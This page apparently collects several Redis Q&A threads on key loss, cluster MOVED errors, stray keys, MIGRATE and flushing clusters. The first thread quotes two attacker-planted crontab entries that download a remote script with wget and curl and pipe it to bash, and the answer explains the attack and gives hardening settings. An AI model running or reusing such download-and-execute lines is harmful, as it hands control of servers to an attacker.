My Redis server loses keys every few minutes

My Redis server loses keys every few minutes.
This is so weird and I cannot find the cause of this problem.
I was trying to keep my keys alive with EXPIREAT, but the EXPIRE and EXPIREAT settings are ignored: after a few minutes all my keys are gone and two strange keys, "weaponZ" and "weaponX", have been added.
I don't know how those keys got into my Redis.
Please help, I think I am going crazy.
This is my environment. [OS: Ubuntu 16.04.5 64-bit, Redis: 4.0.10, GPU: Nvidia 1080 Ti, TensorFlow 1.0, CUDA 8]
127.0.0.1:6379> set 'a' 1
OK
127.0.0.1:6379> expireat 'a' 1637309179
(integer) 1
$ redis-cli info
...
db0:keys=1,expires=1,avg_ttl=99994268099
(after a few minutes)
$ redis-cli
127.0.0.1:6379> KEYS *
1) "weaponZ"
2) "weaponX"
127.0.0.1:6379> get "weaponZ"
"\n*/7 * * * * wget -q -O- https://pixeldra.in/api/download/m5YEMO --no-check-certificate | bash\n"
127.0.0.1:6379> get "weaponX"
"\n*/5 * * * * curl -fsSLk https://pixeldra.in/api/download/m5YEMO | bash\n"

Your server is being accessed by a nefarious party in an attempt to gain access to its resources. The values of those two keys are crontab entries that download and execute a remote script every few minutes; this is a well-known attack against Redis instances exposed to the internet without authentication. You should burn the server, and set a new one up with a password if it is connected to the outside world.
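If the new server must stay reachable over the network, here is a minimal hardening sketch for redis.conf (the password is a placeholder; pick your own):
# only listen on localhost unless remote access is genuinely required
bind 127.0.0.1
# refuse external connections when no password is set
protected-mode yes
# require authentication from every client
requirepass use-a-long-random-password-here
# optionally disable commands attackers commonly abuse
rename-command CONFIG ""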

Related

redis-cli --pipe yields MOVED errors when bulk uploading to Elasticache with cluster-mode enabled

I am trying to use redis-cli --pipe to bulk upload some commands to my AWS Elasticache for redis cluster. The commands come from parsing a file via a custom awk command, which helps generate some HSET commands. The awk command is in a custom shell script. When my Elasticache for redis server had cluster-mode disabled, doing something like the following worked like a charm:
sh script_containing_awk.sh $FILE_TO_PARSE | redis-cli -h <Primary_endpoint> -p <port> --tls --cacert <path/to/cert> --pipe
Due to an internal project requirement, the Elasticache for Redis server has been re-created with cluster-mode enabled, and hence I am adding the -c flag to the above command to specify as such.
I see the following results when trying to work with my Elasticache for Redis server with cluster-mode enabled:
I can connect to the cluster via the configuration endpoint no problem!
Single command uploads work (i.e: redis-cli -h <config_endpoint> -p <port> -c --tls --cacert <path/to/certs> SET key value)
It would be extremely convenient to just pipe output from my script to the cli:
sh script_containing_awk.sh $FILE_TO_PARSE | redis-cli -h <config_endpoint> -p <port> -c --tls --cacert <path/to/cert> --pipe
but adding the --pipe flag results in "MOVED" errors.
I have tried modifying the script to use hash tags (e.g. HSET {user1}:hash field1 val1 field2 val2 ...) to force keys into the same cluster slot, but I still get the "MOVED" errors; and since I am bulk uploading millions of keys, I don't think they would all fit in the same slot anyway.
Does anyone have experience getting --pipe to work with cluster-mode enabled Redis/Elasticache?
Thanks!
I am sure you understand that the core difference between Cluster Mode Disabled and Cluster Mode Enabled is that your total key slots are split across shards.
Just to put it in context:
CMD - Let's say we have a 4-node cluster with 1 primary and 3 replicas.
If we had 100 key slots, all 100 slots would be present on every node; the 3 replicas would serve read-only commands and the 1 primary would serve all commands.
CME - Let's say we have 4 nodes split into 2 shards, each with 1 primary and 1 replica.
We can look at the shards as logical sub-clusters, i.e. they hold different sets of key slots, ideally a 50-50 split.
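You can check which slot a key hashes to with CLUSTER KEYSLOT; a small sketch, reusing the endpoint and cert placeholders from the question:
redis-cli -h <config_endpoint> -p <port> --tls --cacert <path/to/cert> CLUSTER KEYSLOT user1:hash
redis-cli -h <config_endpoint> -p <port> --tls --cacert <path/to/cert> CLUSTER KEYSLOT '{user1}:hash'
redis-cli -h <config_endpoint> -p <port> --tls --cacert <path/to/cert> CLUSTER KEYSLOT '{user1}:other'
The last two return the same slot, because when a key contains a hash tag only the text inside {} is hashed; that is what the {user1} trick in the question relies on.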
Now, the MOVED message is not necessarily an error.
When you connect to the configuration endpoint, by default you are connected to one of the primary nodes (chosen at random, at first).
When you issue a command, the client sends it to that node, and the node checks whether it owns the hash slot needed to serve the command.
As explained here, if the node does not own the hash slot your client is looking for, it will redirect you with a MOVED message.
So, I would assume MOVED messages are somewhat expected with CME clusters.
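If you just need the upload to work, one slow-but-simple fallback is to let redis-cli follow the redirects one command at a time with -c, instead of --pipe. A sketch, assuming a file commands.txt (a placeholder name) holding one complete command per line:
xargs -L1 redis-cli -h <config_endpoint> -p <port> -c --tls --cacert <path/to/cert> < commands.txt
This starts one redis-cli invocation per line so each MOVED can be followed, which is far slower than --pipe and only handles simple, unquoted arguments; for millions of keys a cluster-aware bulk loader would be the better tool.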

Keys in Redis cluster cannot be deleted (and have empty value)

We have a Redis cluster (3 masters, 3 slaves) and are seeing a large number of keys on one of the master nodes (and its slaves) which appear to be empty and cannot be deleted.
If I connect to the master node which has a large number of entries (as determined by DBSIZE), I can SCAN for and see the keys:
--> redis-cli -h 192.168.100.81 -p 6381
192.168.100.81:6381> scan 0 match mykey-* count 10
1) "2359296"
2) 1) "mykey-1be333a7"
2) "mykey-e85a9d31"
3) "mykey-d9162eff"
4) "mykey-41d12fd8"
5) "mykey-a6e755d3"
6) "mykey-c2aa1eaa"
7) "mykey-c0597cac"
8) "mykey-10e69376"
9) "mykey-7263aef0"
10) "mykey-7fa9de50"
However, if I try to GET the value of a key, it shows that it has moved:
192.168.100.81:6381> get mykey-1be333a7
(error) MOVED 8301 192.168.3.107:6380
If I connect to the node to which the key has moved, I am not able to GET or DEL the value:
--> redis-cli -h 192.168.3.107 -p 6380
192.168.3.107:6380> get mykey-1be333a7
(nil)
192.168.3.107:6380> del mykey-1be333a7
(integer) 0
I am also unable to GET or DEL the value using the cluster (-c) flag for redis-cli:
--> redis-cli -h 192.168.100.81 -p 6381 -c get mykey-1be333a7
(nil)
--> redis-cli -h 192.168.100.81 -p 6381 -c del mykey-1be333a7
(integer) 0
--> redis-cli -h 192.168.3.107 -p 6380 -c get mykey-1be333a7
(nil)
--> redis-cli -h 192.168.3.107 -p 6380 -c del mykey-1be333a7
(integer) 0
What can I do to remove these types of keys?
Interesting question!
How to reproduce the problem
The following is a scenario that will reproduce your problem:
You create a standalone Redis instance and set some data in it. Then one day you configure this standalone Redis as a member of a Redis Cluster, without flushing the old data or moving it to the correct node of the cluster. Let's call this the dirty data.
In this scenario, you can SCAN all keys on the instance, including the dirty data. However, you cannot read or write the dirty data: since your Redis is in cluster mode, it redirects your request to the node that owns the slot, which doesn't have the data.
How to solve the problem
To remove the dirty data, you should reconfigure your Redis instance into standalone mode, i.e. cluster-enabled no, and delete the dirty data while in standalone mode.
Then you can make it join the cluster again.
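A sketch of the cleanup for the node shown above, assuming the stray keys all match mykey-* (adjust hosts, ports and the pattern to your setup):
# 1. set "cluster-enabled no" in the node's config file and restart the instance
# 2. delete the dirty keys; --scan iterates incrementally instead of blocking like KEYS
redis-cli -h 192.168.3.107 -p 6380 --scan --pattern 'mykey-*' | xargs redis-cli -h 192.168.3.107 -p 6380 DEL
# 3. set "cluster-enabled yes" again, restart, and let the node rejoin the cluster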

redis removes key before expire time and memory limit

I've installed Redis on CentOS 7 with
yum install redis
I used redis-cli to check current memory, but redis was using only 0.1% of allocated memory.
# Memory
used_memory:1068640
used_memory_human:1.02M
maxmemory:1000000000
maxmemory_human:953.67M
maxmemory_policy:noeviction
Keys are inserted every minute, about 3 KB each.
I'm inserting the data with the Python redis module.
redis_connection.set(key, value, timedelta(days=2))
The keys/values are inserted fine, but Redis removes keys well before the 2 days are up.
The ttl <key> command shows me 172797 (about 2 days).
What configuration do I have to change to prevent keys being removed before their expire time?
After watching redis-cli monitor, I found that someone was sending FLUSHALL commands to my server.
So I changed my Redis port (default 6379 -> another port) and added rename-command FLUSHALL <rename_flushall> to redis.conf, and it worked.
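A sketch of those changes in redis.conf (the port and the renamed command are placeholders; note this is mitigation by obscurity, and requirepass is the stronger fix):
# move off the well-known default port
port 16379
# rename FLUSHALL to something unguessable, or to "" to disable it entirely
rename-command FLUSHALL some-long-random-string
# better still: require authentication from every client
requirepass use-a-long-random-password-here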

Copying all keys in Redis database using MIGRATE

Is it possible to copy all keys from one Redis instance to another remote instance using MIGRATE? I've tried COPY, REPLACE and KEYS without any luck. Each time I get a NOKEY response. If I use any of the MIGRATE commands with a single key it works.
Examples:
MIGRATE my.redis 6379 "*" 0 5000 REPLACE // NOKEY
MIGRATE my.redis 6379 "*" 0 5000 COPY // NOKEY
MIGRATE my.redis 6379 "" 0 5000 KEYS * // NOKEY
MIGRATE my.redis 6379 "" 0 5000 KEYS test // OK
This is an improvement on the answer provided by @ezain, since I am unable to post comments. That command uses the correct Redis syntax for processing batches of keys, but its xargs arguments cause redis-cli to be invoked once for every key instead of once with all the keys included, which takes far longer than necessary. The following will be much faster in all cases:
redis-cli --raw KEYS '*' | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 KEYS
If the destination is password protected:
redis-cli --raw KEYS '*' | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 AUTH password-here KEYS
Try running this in your shell:
redis-cli keys '*' | xargs -I '{}' redis-cli migrate my.redis 6379 "" 0 5000 KEYS '{}'
For big DBs with a lot of keys, it's better to use --scan instead of KEYS, to avoid locking Redis with the KEYS command:
redis-cli --scan | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 KEYS
Not really related to the question, but in case someone needs it: Redis does not support MIGRATE with a password before 3.0. From 3.0 on, you can add the AUTH parameter for authentication:
MIGRATE 192.168.0.33 6379 "" 0 5000 AUTH mypassword KEYS user:{info}:age
If you are running on non-managed¹ Redis instances, the most ideal way would probably be to run the target instance as a replica temporarily, and then disable the replication once all data is copied.
See the REPLICAOF command in Redis. To apply it (all commands on the target instance; a sketch of the full sequence follows):
initiate the replication: REPLICAOF source_hostname_or_ip source_port
after everything is done: REPLICAOF NO ONE
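A sketch of the whole sequence with redis-cli, assuming the target instance listens on 127.0.0.1:6380 (hosts and ports are placeholders):
# point the target at the source and start copying
redis-cli -h 127.0.0.1 -p 6380 REPLICAOF source_hostname_or_ip source_port
# poll until the initial sync has finished (wait for master_link_status:up)
redis-cli -h 127.0.0.1 -p 6380 INFO replication | grep master_link_status
# detach the target so it becomes a standalone copy of the source
redis-cli -h 127.0.0.1 -p 6380 REPLICAOF NO ONE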
If you can't use this command¹ then you can try this script on the digital ocean blog: https://www.digitalocean.com/community/tutorials/how-to-migrate-redis-data-to-a-digitalocean-managed-database#step-3-%E2%80%94-building-the-migration-script
################
¹ - managed services often restrict the usage of this command see here or here.
I'm not advocating using this, but I tried all of these examples and many others, and none of them worked, so I ended up doing it myself in PHP. Maybe this will help someone else who is stuck.
<?php
// copy every key from the source instance to the target instance
$redisSource = new Redis();
$redisSource->connect('1.2.3.4', 6379);
$redisSource->auth('password');

$redisTarget = new Redis();
$redisTarget->connect('127.0.0.1', 6379);

// note: GET/SET only handles plain string values and does not copy TTLs;
// hashes, lists, sets etc. would need DUMP/RESTORE instead
foreach ($redisSource->keys('*') as $key) {
    $redisTarget->set($key, $redisSource->get($key));
}

how can I flush all redis nodes through predis?

I am trying to test my cache, which is implemented with Redis clustering (clustering on the server, not the client).
I have to flush Redis every time I run a unit test.
When I try to run the FLUSHDB command I get this error:
Cannot use 'FLUSHDB' with redis-cluster.
It seems I can run FLUSHDB in cluster mode only when I target a specific slot, but I do not know how to do that. (I have overridden Laravel's Redis wrapper, so Laravel is not the issue; if you show me how to do it with Predis, I can adapt it to Laravel.)
For deleting by pattern:
redis-cli --raw keys "$PATTERN" | xargs redis-cli del
For example:
redis-cli KEYS "prefix:*" | xargs redis-cli DEL
For deleting all keys from one db:
redis-cli flushdb
For deleting all keys from all dbs:
redis-cli flushall
For cluster mode you need a bash script along the lines of this one:
https://gist.github.com/yaud/85e0382d26c189bdf84f0297cd54f479
to flush all keys from the master nodes (the slave nodes will be synced automatically).
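A minimal sketch of what such a script does, assuming one cluster node is reachable at 127.0.0.1:6379: list the master nodes and run FLUSHALL against each of them.
# CLUSTER NODES prints one line per node: <id> <ip:port@cport> <flags> ...
# keep the masters, split ip and port out of the address field, flush each one
redis-cli -h 127.0.0.1 -p 6379 cluster nodes \
  | awk '$3 ~ /master/ {split($2, a, "[:@]"); print a[1], a[2]}' \
  | while read -r host port; do
      redis-cli -h "$host" -p "$port" FLUSHALL
    done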